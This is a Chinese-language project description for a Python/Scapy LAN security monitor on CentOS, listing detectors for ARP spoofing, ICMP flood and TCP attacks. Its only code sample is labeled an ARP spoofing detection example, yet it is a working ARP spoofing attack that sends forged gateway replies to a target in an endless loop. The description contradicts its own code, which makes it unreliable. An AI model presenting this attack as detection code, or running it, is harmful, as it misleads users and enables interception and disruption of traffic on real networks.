Centos Python ARP欺骗检测软件：局域网安全监控与攻击识别

本项目使用Python语言开发，旨在提供一个功能强大的局域网安全监控工具，能够检测常见的网络攻击，并提供用户友好的界面。主要功能包括：

ARP欺骗攻击检测： 利用Scapy库实现ARP欺骗攻击的检测。如果检测到ARP欺骗攻击，则输出该攻击的类型，否则输出并没有遭到该类攻击。
ICMP Flood攻击检测： 利用Scapy库实现icmp flood攻击的检测。如果检测到icmp flood攻击，则输出该攻击的类型，否则输出并没有遭到该类攻击。
TCP攻击检测： 利用Scapy库实现tcp攻击的检测。如果检测到tcp攻击，则输出该攻击的类型，否则输出并没有遭到该类攻击。
局域网扫描： 利用Scapy库实现局域网内活动主机的IP地址和MAC地址的扫描，并将扫描结果保存在本地文件上。
攻击源记录： 利用Scapy库实现攻击源的IP地址和MAC地址的记录，并将记录保存在本地文件上。
用户登录注册界面： 利用Tkinter库实现用户登录和注册功能。

模块设计与实现

该项目涉及多个模块，需要进行模块化开发，每个模块独立完成特定的功能，最终通过页面跳转实现模块间交互。

主要模块：

ARP欺骗检测模块
ICMP Flood攻击检测模块
TCP攻击检测模块
局域网扫描模块
攻击源记录模块
用户登录注册界面模块

代码示例

由于该项目涉及到很多代码，无法在本说明中完全展示。下面提供一个简单的ARP欺骗检测模块示例：

from scapy.all import *

# 定义目标IP地址
TARGET_IP = '192.168.1.1'
# 定义网关IP地址
GATEWAY_IP = '192.168.1.254'
# 定义攻击者MAC地址
ATTACKER_MAC = '00:11:22:33:44:55'

def arp_spoof(target_ip, gateway_ip, attacker_mac):
    # 构建ARP欺骗数据包
    packet = ARP(op=2, pdst=target_ip, hwdst='ff:ff:ff:ff:ff:ff', psrc=gateway_ip, hwsrc=attacker_mac)
    send(packet, loop=1, verbose=0)

# 启动ARP欺骗攻击
arp_spoof(TARGET_IP, GATEWAY_IP, ATTACKER_MAC)

项目部署

本项目适用于Centos系统，需要安装Python和Scapy库。

总结

本项目旨在提供一个简单易用、功能强大的局域网安全监控工具，能够有效识别常见的网络攻击，并帮助用户保护网络安全。